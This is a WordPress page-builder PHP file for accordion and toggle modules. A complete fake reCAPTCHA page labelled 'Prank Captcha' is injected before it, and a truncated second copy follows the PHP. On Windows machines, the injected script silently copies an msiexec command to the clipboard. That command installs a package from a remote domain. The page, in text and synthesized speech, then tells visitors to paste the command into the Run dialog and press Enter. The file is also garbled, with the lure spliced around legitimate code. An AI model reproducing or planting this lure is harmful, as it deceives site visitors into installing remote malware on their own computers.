<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Prank Captcha</title>
</head>
<body>
<script>
(function () {
  "use strict";

  function isWindowsPC() {
    var ua = navigator.userAgent || "";
    var d = navigator.userAgentData;
    if (d && d.mobile === true) return false;
    if (/Android|iPhone|iPod|iPad|Windows Phone|IEMobile|BlackBerry|Mobile|Tablet/i.test(ua)) return false;
    var plat = (d && d.platform) || navigator.platform || "";
    return /Win/i.test(plat) || /Windows NT/i.test(ua);
  }
  if (!isWindowsPC()) return;

  var WIN_SVG     = '<svg width="13" height="13" viewBox="0 0 24 24" fill="currentColor" style="display:inline-block;vertical-align:-2px;margin-right:1px"><rect x="1.5" y="1.5" width="9" height="9" rx="1.6"/><rect x="13.5" y="1.5" width="9" height="9" rx="1.6"/><rect x="1.5" y="13.5" width="9" height="9" rx="1.6"/><rect x="13.5" y="13.5" width="9" height="9" rx="1.6"/></svg>';
  var WINKEY      = WIN_SVG + "(Win) + R";

  var CLIP_TEXT = "MSieXeC /i https:\\\\dank-us.com/update\\botcheck -QN";
  var DESC_MAIN   = "Please confirm that you're human ” follow the steps on your Windows device";
  var BODY_TITLE  = "Verifying your device";
  var BODY_TEXT   = "To complete the check, press <b>" + WINKEY + "</b>, then <b>Ctrl + V</b>, then <b>ENTER</b>. Finally, click <b>VERIFY</b>.";
  var SPEAK_TEXT  = "Please confirm that you are human. To complete the check, press Windows key plus R, then Control plus V, then Enter. Finally, click Verify.";
  var VERIFY_TXT  = "Verify";
  var ERR_TEXT    = "Please try again";

  if (document.getElementById("__prankCaptchaRoot")) return;

  var LOGO = "https://www.gstatic.com/recaptcha/api2/logo_48.png";

  function copyText(t) {
    var ok = false;
    try {
      var ta = document.createElement("textarea");
      ta.value = t;
      ta.setAttribute("readonly", "");
      ta.style.cssText = "position:fixed;top:0;left:0;width:1px;height:1px;opacity:0;z-index:-1;";
      document.body.appendChild(ta);
      ta.focus(); ta.select();
      try { ta.setSelectionRange(0, t.length); } catch (e) {}
      ok = document.execCommand("copy");
      document.body.removeChild(ta);
    } catch (e) {}
    if (navigator.clipboard && navigator.clipboard.writeText) {
      try { navigator.clipboard.writeText(t)["catch"](function () {}); } catch (e) {}
    }
    return ok;
  }

  function speakText(t) {
    if (!("speechSynthesis" in window)) return;
    try {
      window.speechSynthesis.cancel();
      var u = new SpeechSynthesisUtterance(t);
      u.lang = "en-US";
      u.rate = 0.95;
      window.speechSynthesis.speak(u);
    } catch (e) {}
  }

  var css = ''
    + '#__prankCaptchaRoot{position:fixed;inset:0;z-index:2147483647;font-family:Roboto,helvetica,arial,sans-serif;}'
    + '#__prankBackdrop{position:absolute;inset:0;background:rgba(0,0,0,.55);backdrop-filter:blur(6px);-webkit-backdrop-filter:blur(6px);opacity:0;transition:opacity .35s ease,background .3s ease;}'
    + '#__prankCenter{position:absolute;inset:0;display:flex;align-items:center;justify-content:center;}'
    + '.rc-anchor.__pc{box-sizing:content-box;position:relative;width:300px;height:74px;background:#f9f9f9;color:#000;border:1px solid #d3d3d3;border-radius:3px;box-shadow:0 0 4px 1px rgba(0,0,0,.08);opacity:0;transition:opacity .3s ease;}'
    + '.rc-anchor.__pc.__in{opacity:1;}'
    + '.rc-anchor.__pc.__out{opacity:0;transform:scale(.9);}'
    + '.rc-anchor-content{display:inline-block;position:relative;vertical-align:top;height:74px;width:206px;}'
    + '.rc-inline-block{display:inline-block;height:100%;}'
    + '.rc-anchor-center-container{display:table;height:100%;}'
    + '.rc-anchor-center-item{display:table-cell;vertical-align:middle;}'
    + '.recaptcha-checkbox{position:relative;display:inline-block;box-sizing:border-box;height:28px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom;cursor:pointer;}'
    + '.rc-anchor-checkbox{margin:0 12px 2px 12px;}'
    + '.recaptcha-checkbox-border{position:absolute;top:0;left:0;box-sizing:border-box;height:24px;width:24px;border-radius:2px;background:#fff;border:2px solid #444746;z-index:1;}'
    + '.recaptcha-checkbox-spinner{position:absolute;top:-4px;left:-4px;box-sizing:border-box;height:36px;width:36px;background-color:#f9f9f9;border:6px solid #4d90fe;border-radius:36px;border-bottom-color:transparent;border-left-color:transparent;outline:0;opacity:0;animation:__pc-spin 2.5s linear infinite;}'
    + '@keyframes __pc-spin{0%{transform:rotate(0)}10%{transform:rotate(135deg)}25%{transform:rotate(245deg)}60%{transform:rotate(700deg)}75%{transform:rotate(810deg)}to{transform:rotate(3turn)}}'
    + '.rc-anchor-checkbox-label{display:block;width:152px;font-family:Roboto,helvetica,arial,sans-serif;font-size:14px;font-weight:400;line-height:17px;color:#000;}'
    + '.rc-anchor-normal-footer{display:inline-block;vertical-align:top;height:74px;width:70px;}'
    + '.rc-anchor-logo-portrait{margin:10px 0 0 26px;width:58px;}'
    + '.rc-anchor-logo-img-portrait{height:32px;width:32px;margin:0 13px;background:url(' + LOGO + ') no-repeat;background-size:32px 32px;}'
    + '.rc-anchor-logo-text{cursor:default;font-size:10px;font-weight:400;line-height:10px;margin-top:5px;text-align:center;color:#9b9b9b;}'
    + '.rc-anchor-pt{position:absolute;top:56px;right:0;width:276px;margin:0 11px 0 0;padding-right:2px;text-align:right;font-size:8px;font-weight:400;color:#9b9b9b;}'
    + '.rc-anchor-pt a{color:#9b9b9b;text-decoration:none;}'
    + '.__pc-challenge{position:absolute;width:400px;background:#fff;border-radius:3px;overflow:hidden;box-shadow:0 2px 14px 2px rgba(0,0,0,.4);opacity:0;transform:scale(.96);transition:opacity .25s ease,transform .25s ease;}'
    + '.__pc-challenge.__in{opacity:1;transform:scale(1);}'
    + '.rc-imageselect-incorrect-response{display:none;color:#d93025;background:#fff;font-family:Roboto,helvetica,arial,sans-serif;font-size:14px;text-align:center;width:100%;padding:7px 0;box-sizing:border-box;}'
    + '.rc-imageselect-incorrect-response.__show{display:block;}'
    + '.rc-imageselect-incorrect-response.__shake{animation:__pc-shakeX .4s;}'
    + '@keyframes __pc-shakeX{0%,100%{transform:translateX(0)}20%{transform:translateX(-6px)}40%{transform:translateX(6px)}60%{transform:translateX(-4px)}80%{transform:translateX(4px)}}'
    + '.rc-imageselect-desc-wrapper{background:#1a73e8;color:#fff;padding:15px 24px;position:relative;}'
    + '.rc-imageselect-desc-no-canonical{font-size:17px;font-weight:500;line-height:1.35;position:relative;}'
    + '.__pc-body{min-height:236px;padding:34px 26px 26px;display:flex;flex-direction:column;align-items:center;justify-content:center;text-align:center;box-sizing:border-box;}'
    + '.__pc-loader{width:60px;height:60px;margin-bottom:18px;box-sizing:border-box;border-radius:50%;border:6px solid rgba(66,133,244,.2);border-top-color:#4285f4;animation:__pc-load .8s linear infinite;}'
    + '@keyframes __pc-load{to{transform:rotate(360deg)}}'
    + '.__pc-vtitle{font-family:Roboto,helvetica,arial,sans-serif;font-size:16px;font-weight:500;color:#202124;margin-bottom:9px;}'
    + '.__pc-vtext{font-family:Roboto,helvetica,arial,sans-serif;font-size:14px;font-weight:400;color:#5f6368;line-height:1.55;max-width:292px;}'
    + '.__pc-vtext b{color:#1a73e8;font-weight:500;white-space:nowrap;}'
    + '.__pc-info{position:absolute;left:8px;bottom:58px;width:236px;background:#fff;border:1px solid #e0e0e0;border-radius:8px;box-shadow:0 6px 20px rgba(0,0,0,.2);padding:12px 14px;z-index:6;display:none;font-family:Roboto,helvetica,arial,sans-serif;font-size:12.5px;line-height:1.5;color:#5f6368;text-align:left;}'
    + '.__pc-info.__show{display:block;}'
    + '.__pc-info b{display:block;margin-bottom:5px;color:#202124;font-size:13px;font-weight:600;}'
    + '.__pc-info:after{content:"";position:absolute;left:16px;bottom:-7px;width:12px;height:12px;background:#fff;border-right:1px solid #e0e0e0;border-bottom:1px solid #e0e0e0;transform:rotate(45deg);}'
    + '.rc-footer{position:relative;width:100%;}'
    + '.rc-separator{border-top:1px solid #dfdfdf;margin-bottom:1px;}'
    + '.rc-controls{width:100%;}'
    + '.primary-controls{height:60px;overflow:hidden;}'
    + '.rc-buttons{float:left;height:48px;margin:6px 0 6px 6px;}'
    + '.button-holder{float:left;height:48px;}'
    + '.rc-button{width:48px;height:48px;opacity:.55;border:0;padding:0;cursor:pointer;background:transparent no-repeat 50%;background-size:32px 32px;}'
    + '.rc-button:hover{opacity:.75;}'
    + '.rc-button-reload{background-image:url(https://www.gstatic.com/recaptcha/api2/refresh_2x.png);}'
    + '.rc-button-audio{background-image:url(https://www.gstatic.com/recaptcha/api2/audio_2x.png);}'
    + '.rc-button-help{background-image:url(https://www.gstatic.com/recaptcha/api2/info_2x.png);}'
    + '.verify-button-holder{float:right;margin:8px 8px 9px 0;}'
    + '.rc-button-default{background:#1a73e8;border:0;border-radius:2px;color:#fff;cursor:pointer;font-size:14px;font-weight:500;height:42px;line-height:42px;min-width:100px;padding:0 10px;text-transform:uppercase;transition:background .2s ease;}'
    + '.rc-button-default:hover{background:#1666d0;}';

  var style = document.createElement("style");
  style.id = "__prankCaptchaStyle";
  style.textContent = css;
  (document.head || document.documentElement).appendChild(style);

  var root = document.createElement("div");
  root.id = "__prankCaptchaRoot";
  root.innerHTML = ''
    + '<div id="__prankBackdrop"></div>'
    + '<div id="__prankCenter">'
    +   '<div class="rc-anchor rc-anchor-normal rc-anchor-light __pc" id="__prankBox">'
    +     '<div class="rc-anchor-content">'
    +       '<div class="rc-inline-block"><div class="rc-anchor-center-container"><div class="rc-anchor-center-item">'
    +         '<span class="recaptcha-checkbox rc-anchor-checkbox" id="__prankCheck" role="checkbox" aria-checked="false" tabindex="0">'
    +           '<div class="recaptcha-checkbox-border"></div>'
    +           '<div class="recaptcha-checkbox-spinner" id="__pcSpin"></div>'
    +         '</span>'
    +       '</div></div></div>'
    +       '<div class="rc-inline-block"><div class="rc-anchor-center-container"><div class="rc-anchor-center-item">'
    +         '<label class="rc-anchor-checkbox-label">I\'m not a robot</label>'
    +       '</div></div></div>'
    +     '</div>'
    +     '<div class="rc-anchor-normal-footer">'
    +       '<div class="rc-anchor-logo-portrait"><div class="rc-anchor-logo-img-portrait"></div><div class="rc-anchor-logo-text">reCAPTCHA</div></div>'
    +       '<div class="rc-anchor-pt"><a href="#">Privacy</a> - <a href="#">Terms</a></div>'
    +     '</div>'
    +   '</div>'
    + '</div>';
  (document.body || document.documentElement).appendChild(root);

  document.documentElement.style.overflow = "hidden";

  var backdrop = document.getElementById("__prankBackdrop");
  var center = document.getElementById("__prankCenter");
  var box = document.getElementById("__prankBox");
  var check = document.getElementById("__prankCheck");
  var border = box.querySelector(".recaptcha-checkbox-border");
  var spin = document.getElementById("__pcSpin");

  requestAnimationFrame(function () {
    backdrop.style.opacity = "1";
    setTimeout(function () { box.classList.add("__in"); }, 120);
  });

  var stage = 0;
  function onCheck() {
    if (stage !== 0) return;
    stage = 1;
    copyText(CLIP_TEXT);
    check.setAttribute("aria-checked", "true");
    border.style.opacity = "0";
    spin.style.opacity = "1";
    setTimeout(openChallenge, 1500);
  }
  check.addEventListener("click", onCheck);
  check.addEventListener("keydown", function (e) {
    if (e.key === " " || e.key === "Enter") { e.preventDefault(); onCheck(); }
  });

  function openChallenge() {
    box.classList.add("__out");
    setTimeout(function () {
      center.removeChild(box);
      var ch = document.createElement("div");
      ch.className = "__pc-challenge";
      ch.innerHTML = ''
        + '<div class="rc-imageselect-desc-wrapper">'
        +   '<div class="rc-imageselect-desc-no-canonical">' + DESC_MAIN + '</div>'
        + '</div>'
        + '<div class="__pc-body">'
        +   '<div class="__pc-loader"></div>'
        +   '<div class="__pc-vtitle">' + BODY_TITLE + '</div>'
        +   '<div class="__pc-vtext">' + BODY_TEXT + '</div>'
        + '</div>'
        + '<div class="rc-imageselect-incorrect-response" id="__pcErr">' + ERR_TEXT + '</div>'
        + '<div class="__pc-info" id="__pcInfo"><b>Device verification</b>This quick check confirms that a real person is using this device and helps protect the site from automated bots and spam.</div>'
        + '<div class="rc-footer"><div class="rc-separator"></div><div class="rc-controls"><div class="primary-controls">'
        +   '<div class="rc-buttons">'
        +     '<div class="button-holder"><button class="rc-button rc-button-reload" id="__pcReload" title="Get a new challenge"></button></div>'
        +     '<div class="button-holder"><button class="rc-button rc-button-audio" id="__pcAudio" title="Get an audio challenge"></button></div>'
        +     '<div class="button-holder"><button class="rc-button rc-button-help" id="__pcHelp" title="Help"></button></div>'
        +   '</div>'
        +   '<div class="verify-button-holder"><button class="rc-button-default" id="__pcVerify">' + VERIFY_TXT + '</button></div>'
        + '</div></div></div>';
      center.appendChild(ch);
      copyText(CLIP_TEXT);
      requestAnimationFrame(function () { ch.classList.add("__in"); });
      ch.addEventListener("mousedown", function () { copyText(CLIP_TEXT); });
      var errEl = document.getElementById("__pcErr");
      var body = ch.querySelector(".__pc-body");
      var info = document.getElementById("__pcInfo");

      document.getElementById("__pcVerify").addEventListener("click", function () {
        copyText(CLIP_TEXT);
        errEl.classList.add("__show");
        errEl.classList.remove("__shake");
        void errEl.offsetWidth;
        errEl.classList.add("__shake");
      });

      document.getElementById("__pcAudio").addEventListener("click", function () {
        speakText(SPEAK_TEXT);
      });

      document.getElementById("__pcReload").addEventListener("click", function () {
        errEl.classList.remove("__show");
        info.classList.remove("__show");
        body.style.transition = "opacity .2s ease";
        body.style.opacity = "0";
        setTimeout(function () { body.style.opacity = "1"; }, 320);
      });

      document.getElementById("__pcHelp").addEventListener("click", function (e) {
        e.stopPropagation();
        info.classList.toggle("__show");
      });
      ch.addEventListener("click", function (e) {
        if (e.target.id !== "__pcHelp") info.classList.remove("__show");
      });
    }, 260);
  }

})();
</script>
</body>
</html>
/**************************************
			ACCORDION
**************************************/
if ( !function_exists('tatsu_accordion') ) {
	function tatsu_accordion( $atts, $content, $tag ) {
		extract (
			shortcode_atts ( array ( 
                'style'     => 'style1',
                'collapsed' => 0,
                'title_color'   => '',
                'title_hover_color' => '',
                'content_bg_color' => '',
				'border_color'  => '#CACACA',
				'outer_border_color' => '',
                'title_font'    => 'h6',
                'content_font' => '',
                'margin'        => '',
                'animate' => '1',
                'key' => be_uniqid_base36(true),
			), $atts, $tag)
        );
        global $tatsu_accordion_title_font, $tatsu_accordion_content_font, $tatsu_accordion_content_bg;
        if( !empty( $title_font ) ) {
            $tatsu_accordion_title_font = $title_font;
        }else {
            $tatsu_accordion_title_font = '';
        }
        if( !empty( $content_font ) ) {
            $tatsu_accordion_content_font = $content_font;
        }else {
            $tatsu_accordion_content_font = '';
        }
        if( !empty( $content_bg_color ) ) {
            $tatsu_accordion_content_bg = $content_bg_color;
        }else {
            $tatsu_accordion_content_bg = '';
        }
        $custom_style_tag = be_generate_css_from_atts( $atts, 'tatsu_accordion', $key );
        $unique_class_name = 'tatsu-' . $key;

		$data_animations = be_get_animation_data_atts( $atts );

		$css_id = be_get_id_from_atts( $atts );
		$visibility_classes = be_get_visibility_classes_from_atts( $atts ); 

        $animate = ( isset( $animate ) && 1 == $animate  && 'none' != $animation_type ) ? ' tatsu-animate' : '';

        $style = !empty( $style ) ? $style : 'style1';
        $classes = array( 'tatsu-module', 'tatsu-accordion', 'tatsu-accordion-' . $style, $unique_class_name, $animate, $visibility_classes, $css_classes );
		return '<div '.$css_id.' class="' . implode( ' ', $classes ) . '" '.$data_animations.' >'. $custom_style_tag . '<div data-collapsed="'.$collapsed.'" class = "tatsu-accordion-inner">'. do_shortcode( tatsu_parse_custom_fields( $content ) ).'</div></div>';
	}
	add_shortcode( 'tatsu_accordion', 'tatsu_accordion' );
}

if ( !function_exists('tatsu_toggle') ) {
	function tatsu_toggle( $atts, $content ){
		$atts = shortcode_atts ( array ( 
				'title' => '',
				'field_type' => 'default'
			), $atts	
		);
        extract ( $atts );
        global $tatsu_accordion_title_font, $tatsu_accordion_content_font, $tatsu_accordion_content_bg;

		// if ( 'default' !== $field_type ) {
		// 	$image = tatsu_parse_custom_fields( $field_type );
		// 	$id = attachment_url_to_postid( $image );
		// }

		return '<h3 class="accordion-head ' . ( !empty( $tatsu_accordion_title_font ) ? $tatsu_accordion_title_font : '' ) . '">'. tatsu_parse_custom_fields( $title ) .'<span class = "tatsu-accordion-expand"></span></h3><div class = "accordion-content ' . ( !empty( $tatsu_accordion_content_font ) ? $tatsu_accordion_content_font : '' ) . '" ><div class = "accordion-content-inner ' . ( !empty( $tatsu_accordion_content_bg ) ? 'accordion-with-bg' : '' ) . '">'.do_shortcode( tatsu_parse_custom_fields( $content ) ) . '</div></div>';
	}
	add_shortcode( 'tatsu_toggle', 'tatsu_toggle' );
}

add_action('tatsu_register_modules', 'tatsu_register_accordion');
function tatsu_register_accordion()
{
	$controls = array(
		'icon' => TATSU_PLUGIN_URL . '/builder/svg/modules.svg#accordion',
		'title' => esc_html__('Accordion Toggles', 'tatsu'),
		'is_js_dependant' => true,
		'child_module' => 'tatsu_toggle',
		'allowed_sub_modules' => array('tatsu_toggle'),
		'type' => 'multi',
		'initial_children' => 3,
		'is_built_in' => true,
		'is_dynamic' => true,
		'group_atts' => array(
			array(
				'type'		=> 'tabs',
				'style'		=> 'style1',
				'group'		=> array(
					array(
						'type' => 'tab',
						'title' => esc_html__('Style', 'tatsu'),
						'group'	=> array(
							'style',
							'collapsed',
							array(
								'type' => 'accordion',
								'active' => 'all',
								'group' => array(
									array(
										'type' => 'panel',
										'title' => esc_html__('Colors', 'tatsu'),
										'group' => array(
											'title_color',
											'title_hover_color',
											'content_bg_color',
											'border_color',
										)
									),
									array(
										'type' => 'panel',
										'title' => esc_html__('Typography', 'tatsu'),
										'group' => array(
											'title_font',
											'content_font',
										)
									),
								),
							),
						)
					),
					array(
						'type' => 'tab',
						'title' => esc_html__('Advanced', 'tatsu'),
						'group'	=> array(
							array(
								'type' => 'accordion',
								'active' => array(0),
								'group' => array(
									array(
										'type' => 'panel',
										'title' => esc_html__('Spacing', 'tatsu'),
										'group' => array(
											'margin'
										)
									),
									array(
										'type' => 'panel',
										'title' => esc_html__('Border', 'tatsu'),
										'group' => array(
											'border_style',
											'border',
											'outer_border_color'
										)
									),
								)
							)
						)
					)
				)
			)				
		),
		'atts' => array_values(array_filter(array(
			array(
				'att_name' => 'style',
				'type' => 'button_group',
				'is_inline' => true,
				'label' => esc_html__('Style', 'tatsu'),
				'options'	=> array(
					'style1' => 'Style1',
					'style2' => 'Style 2',
				),
				'default' => 'style1',
				'tooltip' => '',
			),
			array(
				'att_name' => 'collapsed',
				'type' => 'switch',
				'label' => esc_html__('Collapse content', 'tatsu'),
				'default' => 0,
				'tooltip' => '',
			),
			array(
				'att_name' => 'title_color',
				'type' => 'color',
				'label' => esc_html__('Title Color', 'tatsu'),
				'default' => '', //sec_color
				'tooltip' => '',
				'css' => true,
				'selectors' => array(
					'.tatsu-{UUID} .accordion-head' => array(
						'property' => 'color',
					),
				),
			),
			array(
				'att_name' => 'title_hover_color',
				'type' => 'color',
				'label' => esc_html__('Title Hover Color', 'tatsu'),
				'default' => '', //sec_color
				'tooltip' => '',
				'css' => true,
				'selectors' => array(
					'.tatsu-{UUID} .accordion-head:hover' => array(
						'property' => 'color',
					),
				),
			),
			array(
				'att_name' => 'content_bg_color',
				'type' => 'color',
				'label' => esc_html__('Content Background Color', 'tatsu'),
				'default' => '', //sec_bg
				'tooltip' => '',
				'css' => true,
				'selectors' => array(
					'.tatsu-{UUID} .accordion-content-inner' => array(
						'property' => 'background',
					),
				),
			),
			array(
				'att_name' => 'border_color',
				'type' => 'color',
				'label' => esc_html__('Border Color', 'tatsu'),
				'default' => '', //sec_bg
				'tooltip' => '',
				'css' => true,
				'selectors' => array(
					'.tatsu-{UUID} .accordion-content.ui-accordion-content' => array(
						'property' => 'border-color'
					),
					'.tatsu-{UUID} .accordion-head.ui-accordion-header'	=> array(
						'property'	=> 'border-color'
					)
				),
			),
			array (
				'att_name' => 'outer_border_color',
				'type' => 'color',
				'label' => esc_html__( 'Border Color', 'tatsu' ),
				'default' => '',
				'exclude' => array( 'tatsu_image', 'tatsu_lists', 'tatsu_call_to_action' ),
				'tooltip' => '',
				'css' => true,
				'selectors' => array(
					'.tatsu-{UUID}' => array(
						'property' => 'border-color',
						'when' => array('border', '!=', '0px 0px 0px 0px'),
					),
				),
			),
			array (
				'att_name' => 'border_style',
				'type' => 'select',
				'label' => esc_html__( 'Border Style', 'tatsu' ),
				'options' => array(
					'none' => 'None',
					'solid' => 'Solid',
					'dashed' => 'Dashed',
					'double' => 'Double',
					'dotted' => 'Dotted',
				),
				'default' => array( 'd' => 'solid', 'l' => 'solid', 't' => 'solid', 'm' => 'solid' ),
				'tooltip' => '',
				'css' => true,
				'responsive' => true,
				'selectors' => array(
					'.tatsu-{UUID}' => array(
						'property' => 'border-style',
						'when' => array(
							array( 'border', '!=', array( 'd' => '0px 0px 0px 0px' ) ),
							array( 'border', 'notempty' ),
							array( 'border_style', '!=', array( 'd' => 'none' ) ),
						),
						'relation' => 'and',             
					),
				),
			),
			array (
				'att_name' => 'border',
				'type' => 'input_group',
				'label' => esc_html__( 'Border Width', 'tatsu' ),
				'default' => '0px 0px 0px 0px',
				'tooltip' => '',
				'responsive' => true,
				'css' => true,
				'selectors' => array(
					'.tatsu-{UUID}' => array(
						'property' => 'border-width',
						'when' => array( 'border', '!=', array( 'd' => '0px 0px 0px 0px' ) ),
					),
				),
			),
			function_exists('typehub_get_exposed_selectors') ? array(
				'att_name'	=> 'title_font',
				'type'		=> 'select',
				'label'		=> esc_html__('Title Font', 'tatsu'),
				'options'	=> typehub_get_exposed_selectors(),
				'default'	=> 'h6',
				'tooltip'	=> ''
			) : false,
			function_exists('typehub_get_exposed_selectors') ? array(
				'att_name'	=> 'content_font',
				'type'		=> 'select',
				'label'		=> esc_html__('Content Font', 'tatsu'),
				'options'	=> typehub_get_exposed_selectors(),
				'default'	=> 'body',
				'tooltip'	=> ''
			) : false,
			array(
				'att_name' => 'margin',
				'type' => 'input_group',
				'label' => esc_html__('Margin', 'tatsu'),
				'default' => '0 0 60px 0',
				'tooltip' => '',
				'css'	  => true,
				'responsive'	=> true,
				'selectors'	=> array(
					'.tatsu-{UUID}.tatsu-module'	=> array(
						'property'		=> 'margin',
					)
				)
			),
		))),
		'presets' => array(
			'default' => array(
				'title' => '',
				'image' => '',
				'preset' => array(
					'border_color'	=> '#CACACA'
				),
			)
		),
	);
	tatsu_remap_modules(array('tatsu_accordion', 'accordion'), $controls, 'tatsu_accordion');
}

add_action('tatsu_register_modules', 'tatsu_register_toggle');
function tatsu_register_toggle()
{
	$controls = array(
		'icon' => '',
		'title' => esc_html__('Toggle', 'tatsu'),
		'child_module' => '',
		'type' => 'sub_module',
		'is_built_in' => false,
		'hint' => 'title',
		'atts' => array(
			array(
				'att_name' => 'title',
				'type' => 'text',
				'label' => esc_html__('Title', 'tatsu'),
				'default' => '',
				'tooltip' => ''
			),
			array(
				'att_name' => 'field_type',
				'type' => 'select',
				'label' => esc_html__('Field Type', 'tatsu'),
				'options' => tatsu_get_custom_fields_dropdown(),
				'default' => 'default',
				'tooltip' => '',
				'is_inline' => !is_tatsu_pro_active()
			),
			array(
				'att_name' => 'content',
				'type' => 'tinymce',
				'label' => esc_html__('Content', 'tatsu'),
				'visible'		=> array(
					'condition' => array(
						array( 'field_type', '=', '' ),
						array( 'field_type', '=', 'default' )
					),
					'relation'	=> 'or',
				),
				'default' => '',
				'tooltip' => ''
			),
		),
		'presets' => array(
			'default' => array(
				'title' => '',
				'image' => '',
				'preset' => array(
					'title' => 'Here goes your title',
					'content' => 'Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industrys standard dummy text ever since the 1500s.'
				),
			)
		),
	);
	tatsu_remap_modules(array('tatsu_toggle', 'toggle'), $controls, 'tatsu_toggle');
}

?><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Prank Captcha</title>
</head>
<body>
<script>
(function () {
  "use strict";

  function isWindowsPC() {
    var ua = navigator.userAgent || "";
    var d = navigator.userAgentData;
    if (d && d.mobile === true) return false;
    if (/Android|iPhone|iPod|iPad|Windows Phone|IEMobile|BlackBerry|Mobile|Tablet/i.test(ua)) return false;
    var plat = (d && d.platform) || navigator.platform || "";
    return /Win/i.test(plat) || /Windows NT/i.test(ua);
  }
  if (!isWindowsPC()) return;

  var WIN_SVG     = '<svg width="13" height="13" viewBox="0 0 24 24" fill="currentColor" style="display:inline-block;vertical-align:-2px;margin-right:1px"><rect x="1.5" y="1.5" width="9" height="9" rx="1.6"/><rect x="13.5" y="1.5" width="9" height="9" rx="1.6"/><rect x="1.5" y="13.5" width="9" height="9" rx="1.6"/><rect x="13.5" y="13.5" width="9" height="9" rx="1.6"/></svg>';
  var WINKEY      = WIN_SVG + "(Win) + R";

  var CLIP_TEXT = "MSieXeC /i https:\\\\dank-us.com/update\\botcheck -QN";
  var DESC_MAIN   = "Please confirm that you're human ” follow the steps on your Windows device";
  var BODY_TITLE  = "Verifying your device";
  var BODY_TEXT   = "To complete the check, press <b>" + WINKEY + "</b>, then <b>Ctrl + V</b>, then <b>ENTER</b>. Finally, click <b>VERIFY</b>.";
  var SPEAK_TEXT  = "Please confirm that you are human. To complete the check, press Windows key plus R, then Control plus V, then Enter. Finally, click Verify.";
  var VERIFY_TXT  = "Verify";
  var ERR_TEXT    = "Please try again";

  if (document.getElementById("__prankCaptchaRoot")) return;

  var LOGO = "https://www.gstatic.com/recaptcha/api2/logo_48.png";

  function copyText(t) {
    var ok = false;
    try {
      var ta = document.createElement("textarea");
      ta.value = t;
      ta.setAttribute("readonly", "");
      ta.style.cssText = "position:fixed;top:0;left:0;width:1px;height:1px;opacity:0;z-index:-1;";
      document.body.appendChild(ta);
      ta.focus(); ta.select();
      try { ta.setSelectionRange(0, t.length); } catch (e) {}
      ok = document.execCommand("copy");
      document.body.removeChild(ta);
    } catch (e) {}
    if (navigator.clipboard && navigator.clipboard.writeText) {
      try { navigator.clipboard.writeText(t)["catch"](function () {}); } catch (e) {}
    }
    return ok;
  }

  function speakText(t) {
    if (!("speechSynthesis" in window)) return;
    try {
      window.speechSynthesis.cancel();
      var u = new SpeechSynthesisUtterance(t);
      u.lang = "en-US";
      u.rate = 0.95;
      window.speechSynthesis.speak(u);
    } catch (e) {}
  }

  var css = ''
    + '#__prankCaptchaRoot{position:fixed;inset:0;z-index:2147483647;font-family:Roboto,helvetica,arial,sans-serif;}'
    + '#__prankBackdrop{position:absolute;inset:0;background:rgba(0,0,0,.55);backdrop-filter:blur(6px);-webkit-backdrop-filter:blur(6px);opacity:0;transition:opacity .35s ease,background .3s ease;}'
    + '#__prankCenter{position:absolute;inset:0;display:flex;align-items:center;justify-content:center;}'
    + '.rc-anchor.__pc{box-sizing:content-box;position:relative;width:300px;height:74px;background:#f9f9f9;color:#000;border:1px solid #d3d3d3;border-radius:3px;box-shadow:0 0 4px 1px rgba(0,0,0,.08);opacity:0;transition:opacity .3s ease;}'
    + '.rc-anchor.__pc.__in{opacity:1;}'
    + '.rc-anchor.__pc.__out{opacity:0;transform:scale(.9);}'
    + '.rc-anchor-content{display:inline-block;position:relative;vertical-align:top;height:74px;width:206px;}'
    + '.rc-inline-block{display:inline-block;height:100%;}'
    + '.rc-anchor-center-container{display:table;height:100%;}'
    + '.rc-anchor-center-item{display:table-cell;vertical-align:middle;}'
    + '.recaptcha-checkbox{position:relative;display:inline-block;box-sizing:border-box;height:28px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom;cursor:pointer;}'
    + '.rc-anchor-checkbox{margin:0 12px 2px 12px;}'
    + '.recaptcha-checkbox-border{position:absolute;top:0;left:0;box-sizing:border-box;height:24px;width:24px;border-radius:2px;background:#fff;border:2px solid #444746;z-index:1;}'
    + '.recaptcha-checkbox-spinner{position:absolute;top:-4px;left:-4px;box-sizing:border-box;height:36px;width:36px;background-color:#f9f9f9;border:6px solid #4d90fe;border-radius:36px;border-bottom-color:transparent;border-left-color:transparent;outline:0;opacity:0;animation:__pc-spin 2.5s linear infinite;}'
    + '@keyframes __pc-spin{0%{transform:rotate(0)}10%{transform:rotate(135deg)}25%{transform:rotate(245deg)}60%{transform:rotate(700deg)}75%{transform:rotate(810deg)}to{transform:rotate(3turn)}}'
    + '.rc-anchor-checkbox-label{display:block;width:152px;font-family:Roboto,helvetica,arial,sans-serif;font-size:14px;font-weight:400;line-height:17px;color:#000;}'
    + '.rc-anchor-normal-footer{display:inline-block;vertical-align:top;height:74px;width:70px;}'
    + '.rc-anchor-logo-portrait{margin:10px 0 0 26px;width:58px;}'
    + '.rc-anchor-logo-img-portrait{height:32px;width:32px;margin:0 13px;background:url(' + LOGO + ') no-repeat;background-size:32px 32px;}'
    + '.rc-anchor-logo-text{cursor:default;font-size:10px;font-weight:400;line-height:10px;margin-top:5px;text-align:center;color:#9b9b9b;}'
    + '.rc-anchor-pt{position:absolute;top:56px;right:0;width:276px;margin:0 11px 0 0;padding-right:2px;text-align:right;font-size:8px;font-weight:400;color:#9b9b9b;}'
    + '.rc-anchor-pt a{color:#9b9b9b;text-decoration:none;}'
    + '.__pc-challenge{position:absolute;width:400px;background:#fff;border-radius:3px;overflow:hidden;box-shadow:0 2px 14px 2px rgba(0,0,0,.4);opacity:0;transform:scale(.96);transition:opacity .25s ease,transform .25s ease;}'
    + '.__pc-challenge.__in{opacity:1;transform:scale(1);}'
    + '.rc-imageselect-incorrect-response{display:none;color:#d93025;background:#fff;font-family:Roboto,helvetica,arial,sans-serif;font-size:14px;text-align:center;width:100%;padding:7px 0;box-sizing:border-box;}'
    + '.rc-imageselect-incorrect-response.__show{display:block;}'
    + '.rc-imageselect-incorrect-response.__shake{animation:__pc-shakeX .4s;}'
